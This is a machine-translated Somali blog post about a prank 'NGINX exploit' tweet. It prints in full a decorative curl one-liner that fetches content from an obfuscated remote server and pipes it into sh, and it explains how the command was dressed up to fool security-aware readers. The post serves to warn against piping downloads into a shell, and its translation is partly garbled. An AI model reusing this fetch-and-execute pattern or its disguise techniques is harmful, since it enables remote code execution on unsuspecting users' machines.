Ogow. turjumi:
TL;DR: Ha u isticmaalin dhuumaha feylka ee sh ama bash xaalad kasta ha ahaatee. Tani waa hab fiican oo aad ku lumin karto kontoroolka kombiyuutarkaaga.
Waxaan rabaa inaan idinla wadaago sheeko gaaban oo ku saabsan ka faa'iidaysiga majaajilada ah ee PoC ee la sameeyay Maajo 31-keedii. Isla markiiba waxa uu u soo muuqday isaga oo ka jawaabaya warkii
Markii aan dhammeeyey ka shaqeynta farsamo cusub oo qarsoodi ah oo ku jirta curlka, waxaan soo xigtay tweet-kii asalka ahaa oo waxaan " daadiyay PoC shaqeynaya " oo ka kooban hal xariiq oo kood ah oo loo maleynayo inuu ka faa'iideysanayo dayacanka la ogaaday. Dabcan, tani waxay ahayd wax aan macno lahayn. Waxaan u qaatay in isla markiiba la i soo bandhigi doono, iyo in sida ugu fiican aan heli doono dhowr retweets (oh si fiican).
Si kastaba ha ahaatee, ma qiyaasi karin waxa xigay. Caannimadayda tweet-ka ayaa cirka isku shareertay. Waxaa la yaab leh, xilligan (15:00 Moscow wakhtiga Juun 1) dad yar ayaa ogaaday in tani ay tahay been abuur. Dad badan ayaa dib u soo gudbiya iyaga oo aan hubin haba yaraatee (iskaba daa in ay u bogeen sawirada quruxda badan ee ASCII ee ay soo saarto).
Bal eeg sida ay u qurux badan tahay!
In kasta oo dhammaan wareegyadan iyo midabadani ay aad u fiican yihiin, way caddahay in dadku ay ku qasbanaadeen inay ku shubaan koodka mashiinka si ay u arkaan. Nasiib wanaag, daalacayaashu waxay u shaqeeyaan si la mid ah, oo ay weheliso xaqiiqda ah in aanan runtii rabin in aan galo dhibaato sharci ah, koodka lagu aasay boggaygu wuxuu kaliya samayn jiray wicitaanada dhawaaqa iyada oo aan isku dayin in lagu rakibo ama fuliyo koodka dheeraadka ah.
Digression yar:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
Injineerinka-soo-electronic (SEE) waa ka badan yahay phishing-ka oo keliya
Badbaadada iyo aqoonta ayaa qayb weyn ka ahaa tijaabadan. Waxaan filayaa inay yihiin kuwii u horseeday guushiisa. Khadka talisku wuxuu si cad u tilmaamay amniga isagoo tixraacaya "127.0.0.1" (maqalka caanka ah). Localhost waxaa loo tixgaliyaa inay badbaado tahay xogta ku jirtana waligood kama tagin kumbuyuutarkaaga.
Aqoontu waxay ahayd qaybta labaad ee muhiimka ah ee SE ee tijaabada. Maaddaama dadka la beegsanayo ay ugu horreyn ka kooban yihiin dad aqoon u leh aasaaska amniga kombiyuutarka, waxay ahayd muhiim in la sameeyo kood si ay qaybo ka mid ah ugu muuqdaan kuwo la yaqaan oo la yaqaan (oo sidaas darteed ammaan ah). Amaahda walxihii fikradihii hore ee laga faa'iidaysanayay iyo in la isku daro si aan caadi ahayn ayaa la xaqiijiyay in ay tahay mid aad loogu guulaystay.
Hoos waxaa ku yaal falanqayn faahfaahsan oo ku saabsan hal-liner. Wax kasta oo liiskan ku jira ayaa xidhan dabeecadda la isku qurxiyo, oo dhab ahaantii waxba loogama baahna hawlgalkeeda dhabta ah.
Waa maxay qaybaha runtii lagama maarmaanka u ah? Tani -gsS
, -O 0x0238f06a
, |sh
iyo server-ka laftiisa. Adeegaha shabakadu kuma jiraan wax tilmaamo xaasidnimo ah, laakiin waxay si fudud ugu adeegeen sawirada ASCII iyadoo la adeegsanayo amarada echo
qoraalka ku jira index.html
. Marka isticmaaluhu uu khadka la galay |sh
dhexe ee, index.html
raran oo la fuliyay. Nasiib wanaag, ilaaliyaasha server-ka shabakadu ma lahayn ujeedo xun.
-
../../../%00
- waxay ka dhigan tahay ka gudubka hagaha; -
ngx_stream_module.so
- jidka loo maro moduleka NGINX random; -
/bin/sh%00<'protocol:TCP'
- Sida la filayo waanu bilaabaynaa/bin/sh
mashiinka bartilmaameedka ah oo u hagaaji wax soo saarka kanaalka TCP; -
-O 0x0238f06a#PLToffset
- walxo qarsoodi ah, oo la kabo#PLToffset
, si aad ugu ekaato sida kaydka xusuusta ee ku jira PLT; -
|sh;
- qayb kale oo muhiim ah. Waxaan u baahnay inaan wax soo saarka u jiheyno sh/bash si aan u fulino koodka ka imaanaya server-ka weerka ee ku yaal0x0238f06a
(2.56.240.x
); -
nc /dev/tcp/localhost
- dummy kaas oo netcat loola jeedo/dev/tcp/localhost
si wax walba ugu muuqdaan ammaan mar kale. Dhab ahaantii, waxba ma qabato oo waxay ku jirtaa khadka quruxda.
Tani waxay soo gabagabaynaysaa dejinta qoraalka hal sadar ah iyo ka doodista qaybaha "injineernimada-soo-soo-saarka" (phishing-ga adag).
Habaynta Server-ka Shabakadda iyo Tallaabooyinka
Maaddaama inta badan macaamiishayda ay yihiin infosec / jabsadayaal, waxaan go'aansaday inaan ka dhigo server-ka webka in yar oo adkaysi u leh odhaahyada "xiisaha" dhinacooda, si ay raggu u helaan wax ay sameeyaan (oo ay ku farxi lahayd dhigay). Ma doonayo in aan halkan ku liis gareeyo dhammaan cilladaha maadaama ay tijaabadu wali socoto, laakiin kuwani waa dhawr waxyaalood oo serverku sameeyo:
- Wuxuu si firfircoon ula socdaa isku dayga qaybinta ee shabakadaha bulshada qaarkood wuxuuna beddelaa thumbnails kala duwan oo muuqaal ah si uu ugu dhiirrigeliyo isticmaaluhu inuu gujiyo isku xirka.
- Wuxuu u jiheeyaa Chrome/Mozilla/Safari/iwm fiidyaha xayaysiinta ee Thugcrowd halkii laga muujin lahaa qoraalka qolofka.
- Wuxuu daawadaa calamadaha muuqda ee faragelinta/bursiga cad, ka dibna wuxuu bilaabaa u wareejinta codsiyada adeegayaasha NSA (ha!).
- Ku rakibta Trojan, iyo sidoo kale rootkit-ka BIOS, dhammaan kombiyuutarada ay isticmaalayaashu booqdaan martida loo yahay browserka caadiga ah (kaliya kaftan!).
Qayb yar oo ka mid ah antimers
Xaaladdan oo kale, yoolka kaliya ee aan lahaa wuxuu ahaa inaan barto qaar ka mid ah sifooyinka Apache - gaar ahaan, xeerarka qabow ee codsiyada dib u habeynta - oo waxaan u maleeyay: maxaa diidaya?
NGINX Ka faa'iidayso (Run!)
Kusoo Biir
Source: www.habr.com